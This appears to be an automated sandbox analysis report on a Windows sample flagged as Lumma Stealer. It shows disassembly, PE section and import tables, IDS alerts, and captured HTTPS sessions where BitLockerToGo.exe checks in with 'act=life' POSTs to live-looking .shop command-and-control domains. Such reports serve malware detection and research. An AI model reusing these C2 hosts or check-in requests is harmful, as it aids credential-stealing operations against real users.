                ret
                int3
                int3
                int3
                int3
                int3
                int3
                sub esp, 08h
                mov ecx, dword ptr [esp+0Ch]
                mov edx, dword ptr [ecx]
                mov eax, esp
                mov dword ptr [edx+04h], eax
                sub eax, 00010000h
                mov dword ptr [edx], eax
                add eax, 00000BA0h
                mov dword ptr [edx+08h], eax
                mov dword ptr [edx+0Ch], eax
                lea edi, dword ptr [ecx+34h]
                mov dword ptr [edx+18h], ecx
                mov dword ptr [edi], edx
                mov dword ptr [esp+04h], edi
                call 00007FB5B4C79634h
                cld
                call 00007FB5B4C786BEh
                call 00007FB5B4C772F9h
                add esp, 08h
                ret
                jmp 00007FB5B4C794E0h
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                mov ebx, dword ptr [esp+04h]
                mov ebp, esp
                mov dword ptr fs:[00000034h], 00000000h
                mov ecx, dword ptr [ebx+04h]
                cmp ecx, 00000000h
                je 00007FB5B4C794E1h
                mov eax, ecx
                shl eax, 02h
                sub esp, eax
                mov edi, esp
                mov esi, dword ptr [ebx+08h]
                cld
                rep movsd

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xffd0000x44c.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x10640000x2e438.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xffe0000x64ba0.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0xf726a00xb4.data
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x71b0180x71b20021e7f1a607de182bbdf35897cb7cbd57unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x71d0000x85261c0x852800025c3b533d493e64e597d5b4fff8e967unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0xf700000x8cdc00x618007c7b03e2d53ecd18bf0dadc7e2d84e5bFalse0.3582256610576923data5.48703318555367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xffd0000x44c0x600449034e9ad5ade76de43bfa8a20bc50dFalse0.3580729166666667OpenPGP Public Key3.874332394538109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .reloc0xffe0000x64ba00x64c00f1d80ad4b469ee811585878c4ec281beFalse0.5567763259925558data6.6617831839663655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                .symtab0x10630000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                .rsrc0x10640000x2e4380x2e600fa619e78855a02d691639726cd8d32c9False0.32628769373315364data5.8839350977448355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0x10642fc0x5d55PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9973213912024442
                RT_ICON0x106a0540x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.14030521708269253
                RT_ICON0x107a87c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.25015766239226406
                RT_ICON0x1083d240x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.28160813308687616
                RT_ICON0x10891ac0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.26547000472366555
                RT_ICON0x108d3d40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.3892116182572614
                RT_ICON0x108f97c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.46669793621013134
                RT_ICON0x1090a240x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.5905737704918033
                RT_ICON0x10913ac0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6622340425531915
                RT_GROUP_ICON0x10918140x84data0.7272727272727273
                RT_VERSION0x10918980x574data0.3008595988538682
                RT_MANIFEST0x1091e0c0x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                Imports

                DLLImport
                kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Suricata IDS Alerts

                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                2024-08-31T21:10:09.989988+0200TCP2055493ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)149732443192.168.2.4188.114.96.3
                2024-08-31T21:10:10.910343+0200TCP2055493ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)149733443192.168.2.4188.114.96.3
                2024-08-31T21:10:08.990230+0200TCP2055489ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)149731443192.168.2.4188.114.96.3
                2024-08-31T21:10:09.511797+0200UDP2055483ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)16451053192.168.2.41.1.1.1
                2024-08-31T21:10:10.166995+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149732443192.168.2.4188.114.96.3
                2024-08-31T21:10:10.166995+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149732443192.168.2.4188.114.96.3
                2024-08-31T21:10:11.436907+0200TCP2049812ET MALWARE Lumma Stealer Related Activity M2149733443192.168.2.4188.114.96.3
                2024-08-31T21:10:11.436907+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149733443192.168.2.4188.114.96.3
                2024-08-31T21:10:09.506016+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149731443192.168.2.4188.114.96.3
                2024-08-31T21:10:09.506016+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149731443192.168.2.4188.114.96.3
                2024-08-31T21:10:08.487141+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149730443192.168.2.4104.21.69.149
                2024-08-31T21:10:08.487141+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149730443192.168.2.4104.21.69.149
                2024-08-31T21:10:08.512604+0200UDP2055479ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)16541053192.168.2.41.1.1.1

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 31, 2024 21:10:07.505351067 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:07.505393028 CEST44349730104.21.69.149192.168.2.4
                Aug 31, 2024 21:10:07.505460024 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:07.530114889 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:07.530131102 CEST44349730104.21.69.149192.168.2.4
                Aug 31, 2024 21:10:08.021507025 CEST44349730104.21.69.149192.168.2.4
                Aug 31, 2024 21:10:08.021574974 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:08.023972034 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:08.023978949 CEST44349730104.21.69.149192.168.2.4
                Aug 31, 2024 21:10:08.024180889 CEST44349730104.21.69.149192.168.2.4
                Aug 31, 2024 21:10:08.067917109 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:08.069905043 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:08.069905043 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:08.069997072 CEST44349730104.21.69.149192.168.2.4
                Aug 31, 2024 21:10:08.487154007 CEST44349730104.21.69.149192.168.2.4
                Aug 31, 2024 21:10:08.487247944 CEST44349730104.21.69.149192.168.2.4
                Aug 31, 2024 21:10:08.487335920 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:08.489404917 CEST49730443192.168.2.4104.21.69.149
                Aug 31, 2024 21:10:08.489428043 CEST44349730104.21.69.149192.168.2.4
                Aug 31, 2024 21:10:08.527875900 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:08.527900934 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:08.527987003 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:08.528275967 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:08.528295040 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:08.990135908 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:08.990230083 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:08.993062019 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:08.993071079 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:08.993297100 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:08.994645119 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:08.994674921 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:08.994716883 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:09.506026030 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:09.506130934 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:09.506191015 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:09.506359100 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:09.506370068 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:09.506382942 CEST49731443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:09.506387949 CEST44349731188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:09.532603979 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:09.532634974 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:09.532715082 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:09.533005953 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:09.533020020 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:09.989921093 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:09.989988089 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.022105932 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.022125959 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.022363901 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.068034887 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.069255114 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.069269896 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.069324017 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.166996956 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.167037010 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.167064905 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.167084932 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.167090893 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.167102098 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.167129040 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.167176962 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.167224884 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.271466970 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.271476984 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.271507025 CEST49732443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.271512032 CEST44349732188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.424797058 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.424823046 CEST44349733188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.424885988 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.425432920 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.425447941 CEST44349733188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.910243034 CEST44349733188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.910342932 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.911813974 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.911823988 CEST44349733188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.912048101 CEST44349733188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:10.913249969 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.913280964 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:10.913321972 CEST44349733188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:11.436897993 CEST44349733188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:11.436974049 CEST44349733188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:11.437033892 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:11.437196970 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:11.437206984 CEST44349733188.114.96.3192.168.2.4
                Aug 31, 2024 21:10:11.437218904 CEST49733443192.168.2.4188.114.96.3
                Aug 31, 2024 21:10:11.437222958 CEST44349733188.114.96.3192.168.2.4

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 31, 2024 21:10:07.467325926 CEST5759953192.168.2.41.1.1.1
                Aug 31, 2024 21:10:07.480309963 CEST53575991.1.1.1192.168.2.4
                Aug 31, 2024 21:10:08.512603998 CEST6541053192.168.2.41.1.1.1
                Aug 31, 2024 21:10:08.525922060 CEST53654101.1.1.1192.168.2.4
                Aug 31, 2024 21:10:09.511796951 CEST6451053192.168.2.41.1.1.1
                Aug 31, 2024 21:10:09.531887054 CEST53645101.1.1.1192.168.2.4

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Aug 31, 2024 21:10:07.467325926 CEST192.168.2.41.1.1.10xbc6cStandard query (0)tenseddrywsqio.shopA (IP address)IN (0x0001)false
                Aug 31, 2024 21:10:08.512603998 CEST192.168.2.41.1.1.10xa624Standard query (0)locatedblsoqp.shopA (IP address)IN (0x0001)false
                Aug 31, 2024 21:10:09.511796951 CEST192.168.2.41.1.1.10x7a2dStandard query (0)traineiwnqo.shopA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Aug 31, 2024 21:10:07.480309963 CEST1.1.1.1192.168.2.40xbc6cNo error (0)tenseddrywsqio.shop104.21.69.149A (IP address)IN (0x0001)false
                Aug 31, 2024 21:10:07.480309963 CEST1.1.1.1192.168.2.40xbc6cNo error (0)tenseddrywsqio.shop172.67.209.93A (IP address)IN (0x0001)false
                Aug 31, 2024 21:10:08.525922060 CEST1.1.1.1192.168.2.40xa624No error (0)locatedblsoqp.shop188.114.96.3A (IP address)IN (0x0001)false
                Aug 31, 2024 21:10:08.525922060 CEST1.1.1.1192.168.2.40xa624No error (0)locatedblsoqp.shop188.114.97.3A (IP address)IN (0x0001)false
                Aug 31, 2024 21:10:09.531887054 CEST1.1.1.1192.168.2.40x7a2dNo error (0)traineiwnqo.shop188.114.96.3A (IP address)IN (0x0001)false
                Aug 31, 2024 21:10:09.531887054 CEST1.1.1.1192.168.2.40x7a2dNo error (0)traineiwnqo.shop188.114.97.3A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • tenseddrywsqio.shop
                • locatedblsoqp.shop
                • traineiwnqo.shop

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449730104.21.69.1494436772C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                TimestampBytes transferredDirectionData
                2024-08-31 19:10:08 UTC266OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: tenseddrywsqio.shop
                2024-08-31 19:10:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                Data Ascii: act=life
                2024-08-31 19:10:08 UTC804INHTTP/1.1 200 OK
                Date: Sat, 31 Aug 2024 19:10:08 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=62mlf87k00h58fbnohlhlagjf8; expires=Wed, 25 Dec 2024 12:56:47 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ygUSdx7qSAJ6kHRfK5A9KuS9X9W0mwbBJ%2B9RmR7uFSCdXKnMOp0XX5nHaCljazvErdBc3M%2BkAVgSr8OyTarEt82HqmPpYIkHbet0EavCFvAIMZ%2B1%2BGYqLfKFmqow4F3bUT%2FMcrz"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8bbf51a4bc1a4316-EWR
                alt-svc: h3=":443"; ma=86400
                2024-08-31 19:10:08 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                Data Ascii: aerror #D12
                2024-08-31 19:10:08 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.449731188.114.96.34436772C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                TimestampBytes transferredDirectionData
                2024-08-31 19:10:08 UTC265OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: locatedblsoqp.shop
                2024-08-31 19:10:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                Data Ascii: act=life
                2024-08-31 19:10:09 UTC806INHTTP/1.1 200 OK
                Date: Sat, 31 Aug 2024 19:10:09 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=a5due6nuq0t87f2trk2e5ps0an; expires=Wed, 25 Dec 2024 12:56:48 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LsUccP9tkN7yVV3c65xBOAcY%2FyjliemjDVSdgNXtgF%2Be9Xkn5qkO8RH%2BM8AQQPVPSF5hxm1XyOlu9xtK7DmsBTuXeoAjtBu3l1uNRDFf7OQDWcr5%2B%2BNorbsUi9PfcSXfKjTUQtY%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8bbf51aabcee7c7c-EWR
                alt-svc: h3=":443"; ma=86400
                2024-08-31 19:10:09 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                Data Ascii: aerror #D12
                2024-08-31 19:10:09 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.449732188.114.96.34436772C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                TimestampBytes transferredDirectionData
                2024-08-31 19:10:10 UTC263OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: traineiwnqo.shop
                2024-08-31 19:10:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                Data Ascii: act=life
                2024-08-31 19:10:10 UTC541INHTTP/1.1 200 OK
                Date: Sat, 31 Aug 2024 19:10:10 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Frame-Options: SAMEORIGIN
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=luS6Oz9bBBD9Bk4Jq8Zck9fzxnYNNYCOX0bdECvNp22KxueGKR0cSB2iWzyFpqH8oZkR4DTezJmBiSa%2FItpGmzqaJr87f4dh6iJrqc1m5Br6RL6OFfLySeaVFOiQzUrjJtL7"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8bbf51b13abc4367-EWR
                2024-08-31 19:10:10 UTC828INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                2024-08-31 19:10:10 UTC1369INData Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29
                Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
                2024-08-31 19:10:10 UTC1369INData Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 33 78 6b 34 45 2e 32 6e 44 79 6d 4b 53 74 52 4f 34 33 76 52 44 6a 79 32 32 4a 67 45 30 36 5f 76 4a 6b 4e 72 4c 50 79 76 72 63 67 2d 31 37 32 35 31 33 31 34 31 30 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67
                Data Ascii: <input type="hidden" name="atok" value="3xk4E.2nDymKStRO43vRDjy22JgE06_vJkNrLPyvrcg-1725131410-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="backg
                2024-08-31 19:10:10 UTC839INData Raw: 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20
                Data Ascii: &bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
                2024-08-31 19:10:10 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.449733188.114.96.34436772C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                TimestampBytes transferredDirectionData
                2024-08-31 19:10:10 UTC353OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Cookie: __cf_mw_byp=3xk4E.2nDymKStRO43vRDjy22JgE06_vJkNrLPyvrcg-1725131410-0.0.1.1-/api
